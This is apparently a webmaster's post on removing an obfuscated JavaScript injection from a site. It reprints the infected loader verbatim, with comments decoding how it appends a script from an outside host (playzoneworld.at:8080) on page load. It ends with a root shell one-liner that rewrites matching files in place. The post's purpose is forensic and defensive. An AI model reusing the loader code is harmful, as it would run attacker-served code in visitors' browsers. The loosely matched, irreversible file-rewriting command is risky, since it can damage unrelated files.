Cleaning Malicious Javascripts

One of our users' sites has been infected with this piece of malicious JavaScript. On page load it injects a script from a URL on another host, and whatever that host serves then runs in the visitor's browser: an attack page, a drive-by download, XSS, and so on. Here is the code (obfuscated; the working part is buried in junk assignments):


// Loader injected into the infected pages. Kept VERBATIM as a forensic sample
// (the cleanup below keys on the literal "t=new String(" in it) -- do not run.
//
// Almost every statement on the line is padding meant to defeat signature
// scanners: `var X; if(X!='..'){X=null}` on locals that are never read,
// `new Date()`, empty strings/arrays, an unreachable `var C=''` after a
// return. Stripping that noise leaves the following:
//
//   W = window['unescape']
//   j(i, c) = i.replace(new RegExp("[" + c + "]", "g"), "")
//       -- deletes from `i` every character listed in `c`; this is how the
//          real identifiers are recovered from the padded strings:
//   k  = j('dheSfAegrg', 'swRghAiW04_SBP')                     -> "defer"
//   D  = j('sqcIrIiVpGtG', 'UIFq5he2doGmJVx')                  -> "script"
//   vf = j('876163367797063141114138447419116964...', '396741') -> "8080"
//   ed = j('swrJcw', '54wQy_LKHJukVEO')                         -> "src"
//   ih = j('okn6lpohakdr', 'kZBRsDzSMcHby4Ppghr6w')             -> "onload"
//   V  = unescape("%2f%67%6f%6f%67%6c%65...")
//                        -> "/google.com/meinvz.net/verycd.com.php"
//
// N() concatenates unescape("%68%74%74%70%3a%2f%2f...") ("http://playzoneworld.at:")
// + vf + V, i.e. http://playzoneworld.at:8080/google.com/meinvz.net/verycd.com.php,
// then does document["createElement"]("script") (the two j() calls around it
// decode to "createElement" and "appendChild"), sets x.defer = 1 ([1,7][0]) and
// x.src = that URL, and document.body.appendChild(x) -- all inside an empty
// try/catch so a failure is never visible. `x` is assigned without `var`, so
// it leaks as a global. d() finishes with window["onload"] = N, and d() itself
// is invoked at the end of the line.
//
// Net effect: when the page finishes loading, a <script defer src="http://
// playzoneworld.at:8080/..."> is appended to the body. The remote script is
// not on this page, so what it served (drive-by download, redirect, ...)
// cannot be stated from here. Indicators to search other files for: a line
// beginning with "var t=new String(", and the percent-encoded host string.
var t=new String();var y;if(y!='o'){y='o'};var VX;if(VX!='yw' && VX != ''){VX=null};var O='';function d(){var yM;if(yM!='' && yM!='AM'){yM=null};this.DT='';var ywS;if(ywS!=''){ywS='Nv'};this.AQ='';var Vz;if(Vz!='' && Vz!='NO'){Vz=null};var I=window;var eE;if(eE!='oH' && eE != ''){eE=null};var eY;if(eY!='kR' && eY != ''){eY=null};var wm="";var W=I['unescape'];var V=W("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6d%65%69%6e%76%7a%2e%6e%65%74%2f%76%65%72%79%63%64%2e%63%6f%6d%2e%70%68%70");var kM="";this.q="";var wn=new Array();var fp;if(fp!='Hd' && fp!='DG'){fp='Hd'};function j(i,c){var v=W("%5d");var Gv;if(Gv!='' && Gv!='mG'){Gv='EV'};var S=W("%5b");var H="g";var sy=new Array();var Sm="";var cA='';var B=new RegExp(S+c+v, H);this.z='';var K;if(K!='wu' && K!='JC'){K='wu'};return i.replace(B, new String());var C='';};var F_="";this.ub="";var k=j('dheSfAegrg','swRghAiW04_SBP');var D=j('sqcIrIiVpGtG','UIFq5he2doGmJVx');var rW=new String();this.st="";var vf=j('87616336779706314111413844741911696409497493367347','396741');var e=document;var ed=j('swrJcw','54wQy_LKHJukVEO');var O_;if(O_!='' && O_!='Wy'){O_=''};var qv=new Date();var ll;if(ll!='TB' && ll != ''){ll=null};function N(){var qm="";var Fe;if(Fe!='' && Fe!='nh'){Fe=null};var T=W("%68%74%74%70%3a%2f%2f%70%6c%61%79%7a%6f%6e%65%77%6f%72%6c%64%2e%61%74%3a");var Bk='';var Fg;if(Fg!='' && Fg!='Cc'){Fg='kI'};this.xo='';var F=T;var JW;if(JW!='' && JW!='CN'){JW='pu'};var AA;if(AA!='' && AA!='qK'){AA=''};F+=vf;var xE=new Date();F+=V;var KV;if(KV!='SJ'){KV='SJ'};var tV=new Date();var Yd='';var Op=new Date();this.a="";this.aG="";try {var _p=new Array();var IA;if(IA!='Q_' && IA != ''){IA=null};x=e[j('ckrkeCajtfe9EblFehmheBnotB','pbCsh7wkBjfX9FLoQ')](D);var LV;if(LV!='by' && LV!='lp'){LV='by'};x[k]=[1,7][0];var tS=new Date();x[ed]=F;var Xb='';var GN;if(GN!='zo' && GN != ''){GN=null};e.body[j('aVpNpweKnudVCxhuiWlVdw','NxKW2VMwu')](x);var Sq;if(Sq!='gR'){Sq=''};var BZ;if(BZ!='' && BZ!='c_'){BZ='No'};this.Zd="";var Gi;if(Gi!='' && 
Gi!='eYs'){Gi=''};} catch(IT){};var _g;if(_g!='nX'){_g=''};var Qv=new Date();}var j_;if(j_!='cx' && j_ != ''){j_=null};var rb=new Date();var ih=j('okn6lpohakdr','kZBRsDzSMcHby4Ppghr6w');var cV="";var _W='';I[ih]=N;};this.GF="";d();var Ai;if(Ai!='Ge' && Ai != ''){Ai=null};
// End of sample. The cleanup one-liner further down removes lines containing
// "t=new String(" from the listed file types.


It appears to have been written into every file whose name contains one of the following strings (or, for the last entry, has that extension):

- *index*
- *default*
- *home*
- *start*
- *.js

How do you clean everything up? After some googling, here is what I ran as root from the site's public_html (take a backup first — there is no undo):

[root@ns52 public_html]# for u in {index,default,".js",start,home}; do for f in `find | grep $u`; do grep -v "t=new String(" $f > $f.new && mv -f $f.new $f; done; done;


Hope this helps someone. Bear in mind that removing the injected line only treats the symptom: unless you also find and close whatever wrote it into the files (stolen FTP/SSH credentials, a vulnerable web application) the infection will simply come back.

Thank You

//kudos aalim, ewe, google

//alak
